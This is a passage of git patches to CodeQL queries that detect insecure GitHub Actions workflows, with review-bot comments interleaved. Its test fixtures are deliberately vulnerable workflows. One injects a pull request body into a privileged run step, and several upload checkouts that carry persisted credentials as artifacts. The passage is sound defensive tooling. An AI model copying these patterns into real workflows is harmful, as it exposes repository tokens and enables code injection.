.github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | 
@@ -171,5 +178,8 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. 
|
| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. |
From ac7b7b716260a63258870826588c10a90c5b76e4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 6 Sep 2024 10:50:58 +0200
Subject: [PATCH 483/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 887228ecf882..3fb25b389f89 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.37
+version: 0.1.38
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index b0d446479d88..c806f76f42bb 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.37
+version: 0.1.38
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 4820626f291354570ea113c9c32155ae8ec68757 Mon Sep 17 00:00:00 2001
From: Rasmus Wriedt Larsen
Date: Fri, 6 Sep 2024 14:04:46 +0200
Subject: [PATCH 484/707] Add SyntaxError query
This can be used by autofix, but might also be nice to help find YAML syntax errors :shrug:
---
 ql/src/Debug/SyntaxError.ql | 17 +++++++++++++++++
 .../SyntaxError/SyntaxError.expected | 1 +
 .../query-tests/SyntaxError/SyntaxError.qlref | 1 +
 ql/test/query-tests/SyntaxError/options | 1 +
 4 files changed, 20 insertions(+)
 create mode 100644 ql/src/Debug/SyntaxError.ql
 create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.expected
 create mode 100644 ql/test/query-tests/SyntaxError/SyntaxError.qlref
 create mode 100644 ql/test/query-tests/SyntaxError/options
diff --git a/ql/src/Debug/SyntaxError.ql b/ql/src/Debug/SyntaxError.ql
new file mode 100644
index 000000000000..9a638ad7fbe2
--- /dev/null
+++ b/ql/src/Debug/SyntaxError.ql
@@ -0,0 +1,17 @@
+/**
+ * @name Syntax error
+ * @description A piece of code could not be parsed due to syntax errors.
+ * @kind problem
+ * @problem.severity recommendation
+ * @id actions/syntax-error
+ * @tags reliability
+ * correctness
+ * language-features
+ * debug
+ * @precision very-high
+ */
+
+private import codeql.actions.ast.internal.Yaml
+
+from YamlParseError pe
+select pe, pe.getMessage()
diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.expected b/ql/test/query-tests/SyntaxError/SyntaxError.expected
new file mode 100644
index 000000000000..386e6554e2dc
--- /dev/null
+++ b/ql/test/query-tests/SyntaxError/SyntaxError.expected
@@ -0,0 +1 @@
+| .github/workflows/malformed.yml:7:4:7:4 | expected , but found '' | expected , but found '' |
diff --git a/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/ql/test/query-tests/SyntaxError/SyntaxError.qlref
new file mode 100644
index 000000000000..97c5686103cf
--- /dev/null
+++ b/ql/test/query-tests/SyntaxError/SyntaxError.qlref
@@ -0,0 +1 @@
+Debug/SyntaxError.ql
diff --git a/ql/test/query-tests/SyntaxError/options b/ql/test/query-tests/SyntaxError/options
new file mode 100644
index 000000000000..096355709a6f
--- /dev/null
+++ b/ql/test/query-tests/SyntaxError/options
@@ -0,0 +1 @@
+semmle-extractor-options: --tolerate-parse-errors --experimental
From 2f68e6f26e352ce0373300b386828a5cd05c7633 Mon Sep 17 00:00:00 2001
From: Rasmus Wriedt Larsen
Date: Fri, 6 Sep 2024 14:53:46 +0200
Subject: [PATCH 485/707] Add missing test file
---
 .../SyntaxError/.github/workflows/malformed.yml | 7 +++++++
 1 file changed, 7 insertions(+)
 create mode 100644 ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
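Review bot: `SyntaxError.ql` reaches `YamlParseError` through `private import codeql.actions.ast.internal.Yaml`, an `internal` module, while every other query on this page goes through the public `import actions`; a query that depends on internal layout will break silently when that module is reorganised. If parse errors are meant to be queryable, exporting `YamlParseError` from the public library and importing that here would decouple the query. A short comment above the import, e.g. `// Parse errors are only recorded when the extractor runs with --tolerate-parse-errors (see the test's options file)`, would also explain why the query returns nothing on a default database, which the `options` file added in the same commit implies but nothing in the query states.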
diff --git a/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
new file mode 100644
index 000000000000..a8bfa4ae19a2
--- /dev/null
+++ b/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
@@ -0,0 +1,7 @@
+on: pull_request_target
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.pull_request.body}}
From fefeae44690ce1cbe9b3caba8fbbf4a00878a47e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 6 Sep 2024 17:00:15 +0200
Subject: [PATCH 486/707] feat: New query to report GITHUB_TOKEN exposed in artifacts
---
 ql/src/Security/CWE-312/SecretsInArtifacts.ql | 40 +++++++++++++++++++
 .../workflows/secrets-in-artifacts.yml | 23 +++++++++++
 .../CWE-312/SecretsInArtifacts.expected | 1 +
 .../Security/CWE-312/SecretsInArtifacts.qlref | 2 +
 4 files changed, 66 insertions(+)
 create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.ql
 create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
 create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
 create mode 100644 ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql
new file mode 100644
index 000000000000..07e498706d88
--- /dev/null
+++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql
@@ -0,0 +1,40 @@
+/**
+ * @name Secret In Artifacts
+ * @description Secrets are exposed in GitHub Artifacts
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/secrets-in-artifacts
+ * @tags actions
+ * security
+ * experimental
+ * external/cwe/cwe-312
+ */
+
+import actions
+
+from UsesStep checkout, UsesStep upload
+where
+ checkout.getCallee() = "actions/checkout" and
+ upload.getCallee() = "actions/upload-artifact" and
+ checkout.getAFollowingStep() = upload and
+ (
+ not exists(checkout.getArgument("persist-credentials")) or
+ checkout.getArgument("persist-credentials") = "true"
+ ) and
+ upload.getVersion() =
+ [
+ "v4.3.6", "834a144ee995460fba8ed112a2fc961b36a5ec5a", //
+ "v4.3.5", "89ef406dd8d7e03cfd12d9e0a4a378f454709029", //
+ "v4.3.4", "0b2256b8c012f0828dc542b3febcab082c67f72b", //
+ "v4.3.3", "65462800fd760344b1a7b4382951275a0abb4808", //
+ "v4.3.2", "1746f4ab65b179e0ea60a494b83293b640dd5bba", //
+ "v4.3.1", "5d5d22a31266ced268874388b861e4b58bb5c2f3", //
+ "v4.3.0", "26f96dfa697d77e81fd5907df203aa23a56210a8", //
+ "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", //
+ "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", //
+ "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", //
+ ]
+select upload, "A secret is exposed in a public artifact uploaded by $@", upload,
+ "actions/upload-artifact"
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
new file mode 100644
index 000000000000..611ac16dcfaa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
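Review bot: The `upload.getVersion() = [...]` list of ten tag/SHA pairs carries no comment saying what it enumerates, so a maintainer cannot tell whether a new `actions/upload-artifact` release should be appended or why the list stops at `v4.3.6`; the `test2` job in the fixture is only negative because the floating `v4` tag matches no entry, which is easy to misread as "v4 is safe". A comment above the list such as `// upload-artifact releases that include hidden files (e.g. the .git directory with persisted credentials) by default; later releases are excluded — confirm against the action's changelog` would document the intent, and the query's `@description` could say that the exposed secret is the credential persisted by `actions/checkout`, since that is what the `persist-credentials` condition establishes. It may also be worth checking whether a later release configured with `include-hidden-files: true` reproduces the same exposure and should be matched regardless of version.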
@@ -0,0 +1,23 @@
+name: secrets-in-artifacts
+on:
+ pull_request:
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: results
+ test2:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@v4
+ with:
+ name: file
+ path: results
+
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
new file mode 100644
index 000000000000..67c7fd6e8aac
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
@@ -0,0 +1 @@
+| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact |
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
new file mode 100644
index 000000000000..c9bb538a12d3
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref
@@ -0,0 +1,2 @@
+Security/CWE-312/SecretsInArtifacts.ql
+
From 6eef51e4154410af85604069a74a202d576052fb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 6 Sep 2024 17:22:44 +0200
Subject: [PATCH 487/707] fix: add path checks
---
 ql/src/Security/CWE-312/SecretsInArtifacts.ql | 8 ++-
 .../workflows/secrets-in-artifacts.yml | 51 +++++++++++++++++--
 .../CWE-312/SecretsInArtifacts.expected | 3 ++
 3 files changed, 56 insertions(+), 6 deletions(-)
diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql
index 07e498706d88..e2d8ba93452c 100644
--- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql
+++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql
@@ -35,6 +35,12 @@ where
 "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", //
 "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", //
 "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", //
- ]
+ ] and
+ (
+ not exists(checkout.getArgument("path")) and
+ upload.getArgument("path") = [".", "*"]
+ or
+ checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path")
+ )
 select upload, "A secret is exposed in a public artifact uploaded by $@", upload,
 "actions/upload-artifact"
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
index 611ac16dcfaa..f77a2ab30d3b 100644
--- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml
@@ -2,7 +2,7 @@ name: secrets-in-artifacts
 on:
 pull_request:
 jobs:
- test1:
+ test1: # VULNERABLE
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
@@ -10,8 +10,8 @@ jobs:
 uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
 with:
 name: file
- path: results
- test2:
+ path: .
+ test2: # NOT VULNERABLE
 runs-on: ubuntu-latest
 steps:
 - uses: actions/checkout@v4
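Review bot: The path check added in the new parenthesised clause is plain string equality, so equivalent spellings of the same location — `./`, `foo/`, `./foo`, `foo/**` — fall outside both branches and produce no alert even though they upload the checkout directory exactly as `foo/*` does; only the four literal shapes in the fixture are covered. Normalising both `path` arguments before comparing (strip a leading `./` and a trailing `/`) would be the robust fix; at minimum widening the literals to `upload.getArgument("path") = [".", "./", "*", "**"]` and `checkout.getArgument("path") + ["", "/", "/*", "/**"] = upload.getArgument("path")` closes the common cases while `test6` in the fixture stays negative. A one-line comment above the clause stating that the upload must cover the checkout directory for the persisted credentials to be included would also explain why the `path` arguments are compared at all. The `where` clause this hunk patches begins outside the hunk.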
@@ -19,5 +19,46 @@ jobs:
 uses: actions/upload-artifact@v4
 with:
 name: file
- path: results
-
+ path: .
+ test3: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: "*"
+ test4: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ path: foo
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: foo
+ test5: # VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ path: foo
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: foo/*
+ test6: # NOT VULNERABLE
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ path: pr
+ - name: "Upload artifact"
+ uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2
+ with:
+ name: file
+ path: foo
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
index 67c7fd6e8aac..1c7fd8ab2ce2 100644
--- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
+++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected
@@ -1 +1,4 @@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 37fc6156d09c506e1453c466c84ee6697f0efa88 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:30:49 +0200 Subject: [PATCH 488/707] Removing experimental flag --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index e2d8ba93452c..a7ed799f7610 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -8,7 +8,6 @@ * @id actions/secrets-in-artifacts * @tags actions * security - * experimental * external/cwe/cwe-312 */ From 25eb417acc989030ceb3acedd368ad584a671eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:32:35 +0200 Subject: [PATCH 489/707] Remove public wording --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index a7ed799f7610..494a955f96b4 100644 
--- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -41,5 +41,5 @@ where or checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") ) -select upload, "A secret is exposed in a public artifact uploaded by $@", upload, +select upload, "A secret is exposed in an artifact uploaded by $@", upload, "actions/upload-artifact" From 5e92026f145157c114040568ef4822fc465fff68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:34:55 +0200 Subject: [PATCH 490/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3fb25b389f89..046015a5da8a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.38 +version: 0.1.39 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c806f76f42bb..827836a2dce0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.38 +version: 0.1.39 groups: [actions, queries] suites: codeql-suites extractor: javascript From 72e0851e910db7a85a545d6b0d058451812a17d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:16 +0200 Subject: [PATCH 491/707] Update metadata for Secrets in Artifact query --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 7 ++++--- .../Security/CWE-312/SecretsInArtifacts.expected | 8 ++++---- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index 494a955f96b4..836f1c7dec28 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql 
@@ -1,9 +1,10 @@ /** - * @name Secret In Artifacts - * @description Secrets are exposed in GitHub Artifacts + * @name Storage of sensitive information in GitHub Actions artifact + * @description Including sensitive information in a GitHub Actions artifact can + * expose it to an attacker. * @kind problem * @problem.severity error - * @security-severity 9.0 + * @security-severity 7.5 * @precision high * @id actions/secrets-in-artifacts * @tags actions diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 1c7fd8ab2ce2..86ac293521cf 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected 
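Review bot: The new `@description` says what can go wrong but not what the query actually looks for, which is what a user triaging the alert needs: from the query body (outside this hunk) the condition is an actions/checkout step followed by an actions/upload-artifact version from a fixed list whose `path` covers the checkout, presumably because the credentials checkout persists in the working tree end up in the artifact. Consider `@description Uploading the checked-out repository, including credentials persisted by actions/checkout, as a GitHub Actions artifact can expose them to anyone able to download the artifact.`; it also makes the drop from 9.0 to 7.5 easier to justify in the same breath.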
@@ -1,4 +1,4 @@ -| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 84b02febfe014642dadd572da3942713dea2a8ac Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:53 +0200 Subject: [PATCH 492/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 046015a5da8a..1a3918d5d986 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.39 +version: 0.1.40 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 827836a2dce0..64d40f754805 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.39 +version: 0.1.40 groups: [actions, queries] suites: codeql-suites extractor: javascript From 279b0bb8f175e9b968972ed170fe9f964e8d311d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:33:46 +0200 Subject: [PATCH 493/707] Change description for CWE-1395 query --- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md | 2 +- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md index 61fab1d8ed49..91360a30ed88 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -2,7 +2,7 @@ ## Description -The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize GitHub Actions with known vulnerabilities. ## Recommendations 
diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index c0a81b66a480..497a3b9feb9b 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -1,6 +1,6 @@ /** - * @name Use of known vulnerable 3rd party action. - * @description The workflow is using a known vulnerable 3rd party action. + * @name Use of a known vulnerable action. + * @description The workflow is using an action with known vulnerabilities. * @kind problem * @problem.severity error * @security-severity 7.5 From 2720aaf0972e62691ff50af8bc9545a1f55e918e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:36:29 +0200 Subject: [PATCH 494/707] Add new test for secrets in artifact query --- .../workflows/secrets-in-artifacts.yml | 23 +++++++++++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + 2 files changed, 24 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index f77a2ab30d3b..473d59986957 100644 --- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -62,3 +62,26 @@ jobs: with: name: file path: foo + test7: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + test8: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + 
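Review bot: test7/test8 pin down `persist-credentials`, but the fixture still has no case pairing a checkout with `path: foo` and an upload of `.` or `*`; the query's `not exists(checkout.getArgument("path"))` guard (outside this hunk) makes that combination a negative today, and a labelled fixture would make that decision visible either way. Suggest adding `test9: # VULNERABLE` with `- uses: actions/checkout@v4` plus `path: foo` and an upload of `path: .`, and dropping the trailing blank line this hunk appends at end of file.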
diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 86ac293521cf..0acb306b9d6f 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -2,3 +2,4 @@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | actions/upload-artifact | From f9d66d9b5e1c95885a49b45b4a3b384e8f78a847 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:37:00 +0200 Subject: [PATCH 495/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1a3918d5d986..0392a200bb40 100644 